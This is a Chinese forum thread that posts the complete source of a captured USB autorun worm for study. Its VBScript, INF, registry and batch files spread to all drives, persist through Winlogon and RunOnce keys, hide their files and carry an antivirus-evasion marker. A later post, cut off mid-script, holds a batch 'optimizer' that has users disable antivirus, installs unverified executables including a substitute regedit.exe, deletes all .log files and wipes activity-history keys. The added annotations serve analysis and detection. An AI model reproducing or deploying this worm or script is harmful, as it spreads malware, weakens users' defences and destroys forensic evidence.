|
xiaoyao1987
『楼 主』:
刚刚截获的一个U盘病毒,发出来大家研究下
autorun.vbs
' Specimen: autorun.vbs, the spreading script of the removable-drive worm quoted in this post.
' It copies five files (autorun.bat, sxs.exe, autorun.inf, autorun.reg, autorun.vbs) to the root
' of every eligible drive and into the system folder. Those names, found together in a drive root
' or in the system folder, are the indicators this listing provides.
' Errors are suppressed for the whole script, so a failed copy is never reported.
on error resume next
Set WshShell =CreateObject("WScript.Shell")
' "if 1=0" can never be true: the Else arm below always runs.
if 1=0 then
else
' Written as a single-pass loop; the "i=0" further down resets the counter so the pass repeats.
For i=1 to 1
set Of = CreateObject("Scripting.FileSystemObject")
' GetSpecialFolder(1) is the Windows system folder.
set dir = Of.GetSpecialFolder(1)
Set dc = Of.Drives
' isdir records whether this copy of the script is the one stored in the system folder.
if WScript.ScriptFullName=dir&"\autorun.vbs" then
isdir=true
else
' Started from another location: autorun.bat is run with a hidden window (style 0) and the
' "Open" argument, and the script does not wait for it to finish.
a=WshShell.Run("autorun.bat Open" ,0,False)
isdir=false
end if
' Visit fixed (2) and network (3) drives, and removable (1) drives other than A: and B:.
For Each d In dc
If d.DriveType = 2 Or d.DriveType = 3 or (d.DriveType = 1 and d<>"A:" and d<> "B:") Then
' "autorun.bat - <drive>" clears the attributes of copies already on the drive (see autorun.bat),
' presumably so that they can be overwritten.
a=WshShell.Run("autorun.bat - "&d ,0,True)
if isdir then
' Source: the system folder.
Of.CopyFile dir&"\autorun.bat",d&"\",True
Of.CopyFile dir&"\sxs.exe",d&"\",True
Of.CopyFile dir&"\autorun.inf",d&"\",True
Of.CopyFile dir&"\autorun.reg",d&"\",True
Of.CopyFile dir&"\autorun.vbs",d&"\",True
else
' Source: the current directory.
Of.CopyFile "autorun.bat",d&"\",True
Of.CopyFile "sxs.exe",d&"\",True
Of.CopyFile "autorun.inf",d&"\",True
Of.CopyFile "autorun.reg",d&"\",True
Of.CopyFile "autorun.vbs",d&"\",True
end if
' "autorun.bat + <drive>" marks the copies system, hidden, archive and read-only again.
a=WshShell.Run("autorun.bat + "&d ,0,True)
End If
next
if isdir then
' Copy running from the system folder: wait 60 seconds, then reset the counter so that
' every drive is processed again.
wscript.sleep 60000
i=0
else
' Any other copy: place the five files in the system folder, with the same attribute handling.
a=WshShell.Run("autorun.bat - "&dir ,0,True)
Of.CopyFile "autorun.bat",dir&"\",True
Of.CopyFile "sxs.exe",dir&"\",True
Of.CopyFile "autorun.inf",dir&"\",True
Of.CopyFile "autorun.reg",dir&"\",True
Of.CopyFile "autorun.vbs",dir&"\",True
a=WshShell.Run("autorun.bat + "&dir ,0,True)
End if
next
End if
AUTORUN.INF
; Specimen: autorun.inf, copied to each drive root together with the script.
; It defines the drive's "open" and "explore" context-menu verbs so that either one starts
; WScript.exe on autorun.vbs from the drive root. The captions are the usual Chinese Explorer
; captions ("Open", "Explorer"), so the menu looks unchanged to the user.
; shell\open\Default=1 presumably makes "open" the default verb, i.e. the double-click action.
; Defensive note: these entries only take effect where Windows still processes autorun.inf for
; the drive type in question.
[autorun]
shell\open=打开(&O)
shell\open\Command=WScript.exe .\autorun.vbs
shell\open\Default=1
shell\explore=资源管理器(&X)
shell\explore\Command=WScript.exe .\autorun.vbs
autorun.reg
Windows Registry Editor Version 5.00
; Specimen: autorun.reg, imported without a prompt by autorun.bat (regedit /s).
; Winlogon\Userinit is set to start autorun.bat in addition to userinit.exe, so the batch file
; is launched at every logon. A Userinit value that lists anything besides the userinit.exe path
; is worth checking on a suspect host.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Userinit"="userinit.exe,autorun.bat"
; RunOnce entry that starts sxs.exe, the file the poster describes as the virus body.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"autorun"="sxs.exe"
; Explorer view settings for the current user: protected operating system files are not shown
; (ShowSuperHidden=0) and hidden files are not shown (Hidden=2). The dropped files carry the
; system and hidden attributes, so they stay out of sight in Explorer.
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden"=dword:00000000
"Hidden"=dword:00000002
autorun.bat
@echo off
rem Specimen: autorun.bat, the helper that autorun.vbs calls with "Open", "-" or "+" as first argument.
rem Whenever autorun.reg is present in the current directory it is imported without a prompt.
if exist .\autorun.reg regedit /s .\autorun.reg
rem No argument: start autorun.vbs from the current directory, or failing that from system32, and exit.
if not "%1"=="" goto open
if exist autorun.vbs start WScript.exe autorun.vbs&exit
rem NOTE(review): the next line is not a batch command; its text means "evades antivirus detection"
rem and it presumably only alters the file's content - confirm.
';免杀
if exist %SYSTEMROOT%\system32\autorun.vbs start WScript.exe %SYSTEMROOT%\system32\autorun.vbs&exit
';免杀
:open
rem "Open": show the current folder in Explorer, so the user sees the drive open as expected.
if not "%1"=="Open" goto next
start explorer .\
exit
:next
rem "Over": exit without doing anything.
if not "%1"=="Over" goto :next2
exit
:next2
rem "-" <path>: remove the system, archive, hidden and read-only attributes from autorun.* and sxs.exe.
rem "+" <path>: set those attributes again, which hides the files from a default Explorer view.
if "%1"=="-" attrib -s -a -h -r %2\autorun.*
if "%1"=="-" attrib -s -a -h -r %2\sxs.exe
if "%1"=="+" attrib +s +a +h +r %2\autorun.*
if "%1"=="+" attrib +s +a +h +r %2\sxs.exe
:end
大家随便看看哈,另外的一个sxs.exe就是病毒文件体了,我就不发了
这边的代码貌似还不错
|
|
2007-5-31 15:50 |
|
|
koala
『第
2 楼』:
下载先
2007-7-3 20:10 |
|
|
koala
『第
3 楼』:
宣传一下自己其他在 loveskoala.ys168.com下载
@echo off
setlocal
:environment
rem Environment variables used throughout this script.
rem Some of these declarations may be redundant, but environments differ from PC to PC,
rem so the author sets them explicitly to reduce run-time failures.
rem Author's example: after changing the command prompt's PATH to path=c\windows\system32;
rem some commands failed every time they were run from the prompt. The author asks whether every
rem script must therefore set PATH itself, says the question is still open, and invites e-mail.
rem NOTE(review): the PATH below ends with two directories under %userprofile%, which the logged-on
rem user can presumably write to. The system directories come first, so bare command names resolve
rem there before the profile directories; confirm nothing depends on the later entries for system tools.
path=%systemroot%\system32;%systemroot%;%systemdrive%\;%userprofile%\servicesconfig;%userprofile%\servicesconfig\Tway
rem Full paths of the tools later sections call through these variables.
set regedit=%SystemRoot%\regedit.exe
set find=%SystemRoot%\System32\find.exe
set process=%userprofile%\servicesconfig\process.exe
set regsvr32=%systemroot%\system32\regsvr32.exe
rem Working directory of the script inside the user profile.
set root=%userprofile%\servicesconfig
:_AboutMe
rem Author's self-introduction screen.
rem NOTE(review): the last line of this section starts an executable shipped alongside the script,
rem located through the current directory or PATH; nothing visible here checks the file before it runs.
title 关于我
cls
color 1f
echo.
echo.
echo. 此VB简历是鄙人尚未接触任何正式指导
echo. 情况下,凭借中学时候每次上机房前学习的
echo. 记忆随手写作的一个文件,意在摆脱以往脚
echo. 本的单调性.
echo.
echo.
echo. 仅供增强脚本界面的多彩性
echo.
echo. !!!进入下一步请直接点击左边自我介绍
echo. !!!对话框的"X"
echo.
koala的个人简历.exe
:_define_APP_PATHs
rem Set up the script's working directory: create %root% and copy each helper program into it
rem when it is not already there.
rem NOTE(review): AntiLockReg.exe, process.exe, psexec.exe and pslist.exe are taken from the current
rem directory as they are; no origin or integrity check is visible, and later sections run them.
if not exist "%root%" md "%root%"
if not exist "%root%"\AntiLockReg.exe copy /y AntiLockReg.exe "%root%"
if not exist "%root%"\koala的个人简历.exe copy /y koala的个人简历.exe "%root%"
if not exist "%root%"\process.exe copy /y process.exe "%root%"
if not exist "%root%"\psexec.exe copy /y psexec.exe "%root%"
if not exist "%root%"\pslist.exe copy /y pslist.exe "%root%"
rem Author's note: this section originally read as shown below (without the "rem" prefixes).
rem The "1 file(s) copied" message that appeared every time after the resume was shown
rem was an eyesore, so the section was changed to the form above.
rem if not exist "%root%" md "%root%"
rem copy /y koala的个人简历.exe "%root%"
rem copy /y 屏蔽.reg "%root%"
rem copy /y 启动提速.reg "%root%"
rem copy /y IE受篡改的恢复.reg "%root%"
rem copy /y process.exe "%root%"
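:_Start
rem Start screen: show the introduction text and wait for the Enter key.
title NT核系统服务管理(适用平台:Windows 2000/XP/2003/vista)
color 1f
cls
echo.
echo.
echo ______________________________________________________________________________
echo.
echo 简述
echo.
echo.
echo. 系统没玩多久却发现速度始终不太好,启动时太慢了,比猫还懒 =。=
echo 受不了了,于是决定为系统减减肥.找来优化软件,速度可以了,
echo 但是却很激动地发现我写了N久的文章却 "木"有列,着急啊!?...
echo.
echo 我的数据丢失了倒无所谓,要是你写给MM的情书也给弄丢了...
echo 嘿嘿,m _ m 抱猫哭也没有用了.
echo.
echo.
echo 作者: koala
echo QQ:13019940
echo ______________________________________________________________________________
rem Clear the answer variable. "set select =" (with a space before "=") would act on a
rem different variable whose name ends in a space and leave "select" untouched.
set select=
set /p select= 请按"回车键"继续....
rem Any answer continues: execution reaches the :_go label that follows in either case.
if "%select%" == "" goto :_go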
:_go
rem Warning screen shown before the script changes anything.
rem NOTE(review): the text asks the user to switch off antivirus and firewall software and to allow
rem any alert raised by a registry-protection tool. Combined with the unverified executables this
rem script runs, that request is a reason to inspect the package before running it.
cls
echo.
echo.
echo ______________________________________________________________________________
echo.
echo koala提醒您
echo.
echo 程序运行过程中将会关闭非系统级别的进程以及应用程序,并且
echo 有可能切断网络,请自行关闭杀毒软件以及其他相关防火墙。
echo 请将您的贵重数据转移(或复制)到U盘或移动硬盘等移动存储设
echo 备中以实现安全有效的备份。
echo.
echo 此脚本以注册表操作为主,DOS命令结合为基础,其间涉及大量
echo 注册表操作,脚本运行过程中桌面会自动消失,退出脚本后即正常还原
echo 如果你的杀毒软件(或注册表防护程序)报警并拦截,请你不要恐慌!!!
echo 请将规则设为许可!!!!!
echo.
echo 好了,罗嗦了这些。现在开始,您需要关闭您的杀毒软件。
rem
rem Note: while it runs, the script closes the following processes and programs, which the
rem author considers not essential to the system.
rem
rem System applications:
rem
rem input methods (internat.exe and ctfmon.exe), Task Manager (taskmgr.exe)
rem Explorer (Explorer.exe), Scheduled Tasks (mstask.exe/mstask)
rem Notepad (notepad.exe), DirectX diagnostic helper (ddhelp.exe)
rem "Windows shell process" (kernel32.dll/kernel32), management console (mmc.exe)
rem
rem Network:
rem
rem automatic updates (wuauserv.exe), Application Layer Gateway service (alg.exe), Remote Registry (regsvc.exe), Tencent QQ office mode (ttmplatform.exe)
rem IIS debugging process (inetinfo.exe), SNMP agent (snmp.exe), MyIE browser (myie.exe or myie)
rem input method manager (conime.exe), RealPlayer updater (realsched.exe), wdfmgr.exe and related processes...
rem
rem Applications:
rem
rem Office script debugger (mdm.exe), Windows Messenger (msgsrv.exe), Visual Basic 6 (vb6.exe)
rem printer task control (spool32.exe/spool32), print spooler (spoolsv.exe)
rem scanner and camera service (stisvc.exe), Windows task optimizer (taskmon.exe)
rem
echo ______________________________________________________________________________
set copyright=
set /p copyright= (输入"help"获取更多信息):
rem Empty input skips the copyright screen. Any other input, not only "help", reaches it,
rem because execution falls through to the :_copyright label that follows.
if "%copyright%" == "" goto :_ConfigSomeSpecialServices
if "%copyright%" == "help" goto :_copyright
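:_copyright
rem Copyright screen. ":{" and ":}" are labels the author uses as visual block markers.
:{
cls
echo.
echo.
echo.
echo ______________________________________________________________________________
echo.
echo 版权所有 (C) koala May 14 2007
echo.
echo 测试平台 : Windows XP Pro SP2
echo Windows Vista
echo.
echo 此脚本程序由 "考拉(koala)(又名 汉化猫) " 个人撰写,你可以在保存
echo 程序完整性,以及可运行的前提下任意修改,不合理还指正并提出修改建议,
echo 如果我能很荣幸地收到你的来信.
echo (看koala写的东东,需要以西方的逻辑习惯来理解哦! * _ *)
echo.
echo da2qia1ku5@126.com
echo ______________________________________________________________________________
rem Clear the answer variable. "set EXITcopyright =" (with a space before "=") would act on a
rem different variable whose name ends in a space and leave the real one untouched.
set EXITcopyright=
set /p EXITcopyright= 请按"回车键"继续(可在此处输入" quit" 退出)....
rem "quit" leaves the script; every other answer continues with the next section.
if "%EXITcopyright%" == "quit" goto :_QUIT_
if "%EXITcopyright%" == "" goto _ConfigSomeSpecialServices
:}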
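:_ConfigSomeSpecialServices
rem Take a snapshot of the service configuration, enable the Windows Installer service and run
rem the bundled AntiLockReg.exe.
cls
echo 正在建立系统相关参数的快照.请稍等...
rem Export only the Services key. Without a key argument regedit /e writes the entire registry
rem to the file, and the restore option later imports that file back. The key used here is the
rem one the service-configuration section names for the same snapshot file.
"%regedit%" /e "%root%\ServicesSet.reg.default" "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services"
rem Author's note: this assumes registry editing has been disabled on the target machine (the
rem author stresses that this is not the "Remote Registry" service). The Windows Installer service
rem is enabled first, then a dedicated program that lifts the registry lock is run.
echo 正在启动相关脚本需要的系统服务...
sc config MSIServer start= AUTO
net start MSIServer
cls
echo.
echo finished! please wait for a while...
rem NOTE(review): AntiLockReg.exe is an executable shipped with the script; what it changes cannot
rem be seen from this listing.
AntiLockReg.exe
rem Exit code 1 or higher from AntiLockReg.exe leads to the manual instructions below.
if errorlevel 1 goto _ERROR
cls
goto :LookingForRequiredFile
:_ERROR
rem Tell the user to set the Windows Installer service's start type by hand in services.msc.
cls
echo 安装失败!请以手动打开此项系统服务
echo 方法: "开始" - "运行" 输入 services.msc
echo 下拉滚动条定位到Windows Installer 右击"属性" - "启动"
echo ------------------------------------------------------
echo 配置成功后请按回车键继续...
pause>nul
goto :LookingForRequiredFile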
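:LookingForRequiredFile
cls
rem Check that the file the script needs for a complete run (regedit.exe) is present.
if exist "%systemroot%\regedit.exe" (goto :_KillProcess) else (goto :_NoRegedit)
:_NoRegedit
rem regedit.exe is missing: explain, then copy the regedit.exe shipped with the script into
rem %systemroot% and check again.
rem NOTE(review): this places an executable of unknown origin under the name of a system tool
rem that later sections run. Verify the bundled file before allowing the copy.
color ce
title 必要的文件(regedit.exe)已丢失
cls
echo 系统目录中的%systemroot%\regedit.exe文件已经丢失,
echo 请从其他机器中另行拷贝一份到你的系统中。
pause
cls
echo.
echo 晕!!!不太可能吧!!!你平时都用什么操作注册表的啊
echo 难道和我一样用 一大堆命令行吗!
echo 我暂且还没有发现一款命令行工具能替代regedit的
echo 不过我为准备了一份regedit.exe(koala特别版)免得你
echo 你还要从其他MM(或GG)的电脑上拷一份的麻烦!
echo.
echo 如果出现文件保护请先点"取消"再点"是"
pause
copy /y regedit.exe "%systemroot%"
cls
rem The label is ":LookingForRequiredFile"; the previous "goto :_LookingForRequiredFile"
rem named a label that does not appear in this listing, and a goto to a missing label ends the batch run.
goto :LookingForRequiredFile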
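:_KillProcess
rem Close the processes the script does not need, then continue to the control center.
rem ":{" and ":}" are labels the author uses as visual block markers.
:{
echo.
title 关闭脚本不需要的进程
echo.
echo 下一步即将关闭脚本不需要的进程
echo -------------------------------------------------------------------------
echo 你可能需要稍等一些时间(从1秒-1分钟不等),这得由你的计算机具体配制情况而定
echo 请按"回车键"继续...
pause >nul
:loop
rem One pass over a fixed list of names, in the order the original nested tests used.
rem The original listed the processes again after every kill and only stopped once no listed
rem name appeared any more, so a process that could not be ended or that restarted by itself
rem kept the script in this loop for good. The list also tested taskmgr.exe twice.
rem NOTE(review): the list contains regedit.exe, taskmgr.exe, explorer.exe and wuauserv.exe;
rem the user loses Task Manager and the desktop while the script runs.
cls
echo process正在关闭非系统必要进程,请稍候...
"%process%" > "%temp%\processlist.txt"
for %%P in (WinRAR.exe notepad.exe regedit.exe conime.exe internat.exe ctfmon.exe taskmgr.exe explorer.exe mstask.exe mstask ddhelp.exe kernel32.dll kernel32 mmc alg.exe regsvc.exe inetinfo.exe snmp.exe mdm.exe msgsrv.exe spool32.exe spool32 spoolsv.exe stisvc.exe ttmplatform.exe myie.exe myie realsched.exe wdfmgr.exe wuauserv.exe vb6.exe taskmon.exe) do (
rem find sets errorlevel 0 when the name occurs anywhere in the saved listing.
type "%temp%\processlist.txt"|"%find%" /i "%%P" >NUL
if not errorlevel 1 "%process%" -k %%P
)
echo.
echo 进程终止完毕!
:continue
rem Remove the temporary listing and go on to the menu.
if exist "%temp%\processlist.txt" del /q "%temp%\processlist.txt"
echo 下一步即将脚本控制中心 &pause
goto:_ControlCenter
:}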
:_ControlCenter
rem Control center: main menu of the script.
rem ":{" and ":}" are labels the author uses as visual block markers.
:{
title Windows 2000/XP服务管理
color 1f
cls
echo.
echo =================================================================
echo ======================== 程序控制台 =======================
echo =================================================================
echo 1. ...系统备份(还原请输入11)
echo 2. ...系统垃圾清理
echo 3. ...运行痕迹清理
echo 4. ...系统服务优化
echo 5. ...系统启动提速
echo 6. ...系统安全设置(涉及注册表操作太多,开发ing... ~.~)
echo 7. ...命令提示符
echo 8. ...返回脚本启动界面
echo 9. ...返回桌面
echo 10. ...系统优化
echo 12. ...流氓软件劫持恢复
echo 13. ...磁盘整理
echo 14. ...恶意进程终止
echo 15. ...系统环境变量查询
echo 16. ...撤消系统服务的优化
echo =================================================================
rem The answer defaults to 1 when the user only presses Enter.
SET SELECT=1
SET /P SELECT=请选择您要进行的操作(默认:1)
rem NOTE(review): choices 1, 6 and 11 are shown or mentioned in the menu but have no branch
rem below, so they (and the default) only redraw the menu.
rem The targets _SartUpItemSpeedUp, _CommandLine and _QUIT_ are not part of the visible listing.
IF "%SELECT%" == "2" goto :_SystemJunk
IF "%SELECT%" == "3" goto :_ClearHistory
IF "%SELECT%" == "4" goto :_ServConfig
IF "%SELECT%" == "5" goto :_SartUpItemSpeedUp
IF "%SELECT%" == "7" goto :_CommandLine
IF "%SELECT%" == "8" goto :environment
IF "%SELECT%" == "9" goto :_QUIT_
IF "%SELECT%" == "10" goto :_Optimize
IF "%SELECT%" == "12" goto :_drive_rascal_software_away
IF "%SELECT%" == "13" goto :_CheckDisk
IF "%SELECT%" == "14" goto :_kill_rascal_process
IF "%SELECT%" == "15" goto :_system_variable
IF "%SELECT%" == "16" goto :_ServRestore
rem Anything else shows the menu again.
goto :_ControlCenter
:}
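:_SystemJunk
rem Menu option 2: delete temporary and leftover files, empty the temp folder and schedule
rem a disk check.
cls
echo.
echo 正在对系统垃圾文件分析,请稍等...
echo.
title 系统垃圾清理 --此项旨在清理多余的系统备份以及运行过程中产生的垃圾。
rem For each extension: when a matching file exists in the root of the system drive, clear the
rem attributes of the root-level matches and delete every match on the whole drive (del /s).
rem NOTE(review): "log" is in this list, so all *.log files on the system drive are removed,
rem including logs that troubleshooting or an incident investigation would need.
for %%E in (tmp _mp log gid chk old) do (
if exist %systemdrive%\*.%%E (
attrib -h -s -r -a %systemdrive%\*.%%E
del /f /s /q %systemdrive%\*.%%E
)
)
rem Old-style recycle bin folder, prefetch data, hotfix migration files and Windows logs.
if exist "%systemdrive%\recycled\*.*" attrib -h -s -r -a "%systemdrive%\recycled\*.*" &del /f /s /q "%systemdrive%\recycled\*.*"
if exist "%windir%\prefetch\*.*" attrib -h -s -r -a "%windir%\prefetch\*.*" &del /f /s /q "%windir%\prefetch\*.*"
if exist "%systemroot%\$hf_mig$\*.*" attrib -h -s -r -a "%systemroot%\$hf_mig$\*.*" &del /f /s /q "%systemroot%\$hf_mig$\*.*"
if exist "%systemroot%\*.log" attrib -h -s -r -a "%systemroot%\*.log" &del /f /s /q "%systemroot%\*.log"
rem Recreate the temp folder. The path is quoted and checked for being set: unquoted, a temp
rem path containing spaces is split into several arguments and rd /s /q acts on the wrong paths.
if defined temp rd /s /q "%temp%" &md "%temp%"
if errorlevel 1 cls &echo 缓存文件夹需要手动清理
rem Answer "Y" to chkdsk's prompt so the check of the current drive is scheduled for the next boot.
ECHO Y|CHKDSK/F
cls
echo.
echo 系统垃圾已清理完毕! 请按回车键返回...
echo.
echo 注:脚本已计划在下次启动时进行磁盘整理,
echo 请启动时不要碰键盘,此项目的是加快系统
echo 在下一次启动的速度!
pause
cls
goto :_ControlCenter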
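:_kill_rascal_process
rem Menu option 14: list processes with pslist and end one by PID or by name with ntsd.
rem NOTE(review): ntsd.exe and ntsdexts.dll are copied from the current directory into system32
rem when missing, and the DLL is registered; no check of those files is visible here.
if not exist %systemroot%\system32\ntsd.exe copy /y ntsd.exe %systemroot%\system32
rem The source showed the character "®" before "svr32" here, a damaged "&reg"; restored to "&regsvr32".
if not exist %systemroot%\system32\ntsdexts.dll copy /y ntsdexts.dll %systemroot%\system32 &regsvr32 /s ntsdexts.dll &cls
:{
title 顽固进程ID终止
color 1f
cls
:MENU
rem Clear the variables the prompts below actually fill (the original cleared "_ProcessID",
rem which nothing reads, so an earlier answer could be reused).
set _ProcessManagement=
set ProcessID=
set ProcessName=
echo --------------------------------------------------------
echo 请输入欲终止的进程ID,你可以先对欲终止的进程ID进行查看 ︱
echo 查看请输入"1" 进行终止请输入"0"返回控制台请输入"2" ︱
echo 写作此项的目的:终止占据系统资源无赖进程.个人觉得超实用 ︱
echo --------------------------------------------------------
echo 1. 查看系统进程
echo 2. 返回控制台
echo 3. 终止特定Pid进程
echo 0. 终止特定名称进程
echo --------------------------------------------------------
set /p _ProcessManagement=请输入你将要进行的操作(默认为查看进程):
if "%_ProcessManagement%" == "1" goto :_ListAllProcess
if "%_ProcessManagement%" == "2" goto :_ControlCenter
rem Per the menu text, 3 ends a process by PID and 0 by name; the original had the two targets swapped.
if "%_ProcessManagement%" == "3" goto :_terminateProcess
if "%_ProcessManagement%" == "0" goto :terminateProcess
rem Default: fall through to the process list.
:_ListAllProcess
title 进程查看
cls
echo --------------------------------------------------------
pslist
echo.
echo.
echo 重要提醒:请记下你要终止的进程名的ID或者进程名,然后按"回车键"返回
pause>nul
cls
goto :MENU
:_terminateProcess
rem End a process by PID.
echo.
title 顽固进程终止
echo.
echo 请输入进程ID(如不确定进程 ID请按"回车键"查看)
set /p ProcessID=请输入一个有效的进程ID:
rem The prompt promises that Enter shows the process list.
if "%ProcessID%" == "" goto :_ListAllProcess
ntsd -c q -p "%ProcessID%"
pause>nul
goto :_ControlCenter
:}
:terminateProcess
rem End a process by image name.
echo.
title 顽固进程终止
echo.
echo 请输入进程名(如不确定进程名请按"回车键"查看)
set /p ProcessName=请输入一个有效的进程名:
rem The prompt promises that Enter shows the process list.
if "%ProcessName%" == "" goto :_ListAllProcess
ntsd -c q -pn "%ProcessName%"
pause>nul
goto :_ControlCenter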
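:_ClearHistory
rem Menu option 3: delete temporary files and usage-history entries of Windows and several programs.
rem ":{" and ":}" are labels the author uses as visual block markers.
rem NOTE(review): RecentDocs, RunMRU, OpenSaveMRU, UserAssist, TypedURLs and the cookie and cache
rem folders are also what an examiner uses to reconstruct user activity. On a host under
rem investigation, evidence that this section ran explains why they are empty.
:{
rem Temporary files left by installers. Paths are quoted: a profile path with spaces would
rem otherwise be split into separate arguments.
if exist "%windir%\temp\*.*" rd /s /q "%windir%\temp" & md "%windir%\temp"
if exist "%userprofile%\Local Settings\Temp\*.*" del /f /s /q "%userprofile%\Local Settings\Temp\*.*"
rem Data submitted automatically when logging in to mail, forums and the like (cookies).
if exist "%userprofile%\cookies\*.*" del /f /q "%userprofile%\cookies\*.*"
rem Recently opened files on the local computer.
if exist "%userprofile%\recent\*.*" del /f /q /s "%userprofile%\Recent\*.*"
rem PE Explorer (Chinese edition): history values FILE0..FILE20 and FVFILE0..FVFILE20.
set PE_Reg_Key=HKEY_CURRENT_USER\Software\HeavenTools\PE Explorer 1.0\参数
for /L %%N in (0,1,20) do reg delete "%PE_Reg_Key%" /v FILE%%N /f
rem The original also carried, commented out, the same deletion for the "Last Src" values 0 to 20.
for /L %%N in (0,1,20) do reg delete "%PE_Reg_Key%" /v FVFILE%%N /f
set PE_Reg_Key=
rem Player settings left behind.
reg delete "HKCU\Software\Gabest\VSFilter\DefTextPathes" /v Path1 /f
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StreamMRU" /f
rem KMPlayer traces.
reg delete "HKCU\Software\KMPlayer\WideAlbum\(Default Album)" /f
rem EmEditor traces.
reg delete "HKCU\Software\EmSoft\EmEditor v3\Recent File List" /f
rem Notification-area history.
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\TrayNotify" /f
rem EditPlus 2 traces.
reg delete "HKCU\Software\ES-Computing\EditPlus 2\Recent File List" /f
rem Temporary files created while browsing.
if exist "%userprofile%\Local Settings\Temporary Internet Files\*.*" del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"
rem History of files opened through Explorer. The RecentDocs line had lost its "reg delete"
rem prefix, so cmd tried to run the key path as a command and the key was never removed.
reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs /f
reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32 /f
reg delete HKCU\software\microsoft\windows\currentversion\explorer\runmru /f
reg delete HKCU\software\microsoft\windows\currentversion\explorer\comdlg32\opensavemru /f
reg delete HKCU\software\microsoft\windows\currentversion\explorer\userassist /f
rem WinRAR history.
reg delete "HKCU\software\winrar\ArcHistory" /va /f
reg delete "HKCU\Software\WinRAR\DialogEditHistory\ExtrPath" /va /f
reg delete "HKCU\Software\WinRAR\General" /v lastFolder /f
rem History of files opened through Internet Explorer.
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache" /f
reg delete "HKCU\Software\Microsoft\Internet Explorer\TypedURLs" /f >nul
cls
echo.
echo 历史痕迹已清理完毕! 请按回车键返回...
pause
goto :_ControlCenter
:}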
:_system_variable
rem Menu option 15: detect the Windows edition and version, then jump to the matching section.
cls
color f2
title 系统相关变量
set CHK_SVC=YES
set XPSP2=FALSE
set SERVER=FALSE
rem NT_SERVER_CHK is fixed to TRUE here, so the skip below is never taken as written.
set NT_SERVER_CHK=TRUE
set regedit=%SystemRoot%\regedit.exe
set find=%SystemRoot%\System32\find.exe
echo 正在对系统相关参数进行检测,请稍候...
echo.
if /I "%NT_SERVER_CHK%"=="FALSE" goto :SKIP_NT_SERVER_CHK
rem Export the ProductOptions key to a temporary file and search it for "Server" or "LanMan";
rem either match marks the system as a server edition.
"%regedit%" /e "%TEMP%\~svr.txt" "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions"
type "%TEMP%\~svr.txt"|"%find%" /i "Server" >NUL
if not errorlevel 1 set SERVER=TRUE
type "%TEMP%\~svr.txt"|"%find%" /i "LanMan" >NUL
if not errorlevel 1 set SERVER=TRUE
if exist "%TEMP%\~svr.txt" del /F /Q "%TEMP%\~svr.txt"
if /I "%SERVER%"=="TRUE" goto :NTSERVER
:SKIP_NT_SERVER_CHK
rem Pick the section by the text that "ver" prints.
ver | "%find%" /i "Windows 2000" > nul
if not errorlevel 1 goto :OS2K
ver | "%find%" /i "Windows XP" > nul
if not errorlevel 1 goto :OSXP
ver | "%find%" /i "Microsoft Windows [Version 5.2.3790]" > nul
if not errorlevel 1 goto :OSXP64
rem No match: report that only Windows 2000/XP is supported and leave.
echo !!系统性错误!!
echo __________
echo.
echo 此脚本仅适用于 Windows 2000/XP 操作平台!
echo.
goto :_QUIT_
:NTSERVER
rem Server editions are rejected with a message.
echo.
echo !!系统性错误!!
echo __________
echo.
echo 此脚本不支持 NT服务器 版本!
echo.
goto :_QUIT_
:OS2K
rem Operating system identified (case I): Windows 2000.
set SYSTEM=2k
rem Look for the installed service pack: export the CurrentVersion key to a temporary file and
rem search it for "Service Pack 5" down to "Service Pack 1".
rem Reading the nesting: each "if errorlevel==1 (" opens the "not found" arm of the search just
rem above it; the lines after the matching ")" are the "found" arm of that same search.
"%regedit%" /e "%TEMP%\~svclist.txt" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion"
type "%TEMP%\~svclist.txt"|"%find%" /i "Service Pack 5" >NUL
if errorlevel==1 (
type "%TEMP%\~svclist.txt"|"%find%" /i "Service Pack 4" >NUL
if errorlevel==1 (
type "%TEMP%\~svclist.txt"|"%find%" /i "Service Pack 3" >NUL
if errorlevel==1 (
type "%TEMP%\~svclist.txt"|"%find%" /i "Service Pack 2" >NUL
if errorlevel==1 (
type "%TEMP%\~svclist.txt"|"%find%" /i "Service Pack 1" >NUL
if errorlevel==1 (
cls
echo 您的操作系统是: Windows 2000 [未知类型 Service Pack或尚未安装]
goto NO_2KSP
)
cls
echo 您的操作系统是: Windows 2000 [Service Pack 1]
goto :NO_2KSP
)
cls
echo 您的操作系统是: Windows 2000 [Service Pack 2]
goto :NO_2KSP
)
cls
echo 您的操作系统是: Windows 2000 [Service Pack 3]
goto :NO_2KSP
)
cls
echo 您的操作系统是: Windows 2000 [Service Pack 4]
goto :NO_2KSP
)
cls
echo 您的操作系统是: Windows 2000 [Service Pack 5]
goto :NO_2KSP
:NO_2kSP
rem Remove the temporary export and continue with the environment report.
if exist "%TEMP%\~svclist.txt" del /F /Q "%TEMP%\~svclist.txt"
goto :CONTINUE
:OSXP
rem Operating system identified (case II): Windows XP.
set SYSTEM=xp
rem Look for the installed service pack; XPSP2 is set to TRUE only when "Service Pack 2" is found.
rem Reading the nesting: each "if errorlevel==1 (" opens the "not found" arm of the search just
rem above it; the lines after the matching ")" are the "found" arm of that same search.
"%regedit%" /e "%TEMP%\~svclist.txt" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion"
type "%TEMP%\~svclist.txt"|"%find%" /i "Service Pack 4" >NUL
if errorlevel==1 (
type "%TEMP%\~svclist.txt"|"%find%" /i "Service Pack 3" >NUL
if errorlevel==1 (
type "%TEMP%\~svclist.txt"|"%find%" /i "Service Pack 2" >NUL
if errorlevel==1 (
type "%TEMP%\~svclist.txt"|"%find%" /i "Service Pack 1" >NUL
if errorlevel==1 (
SET XPSP2=FALSE
cls
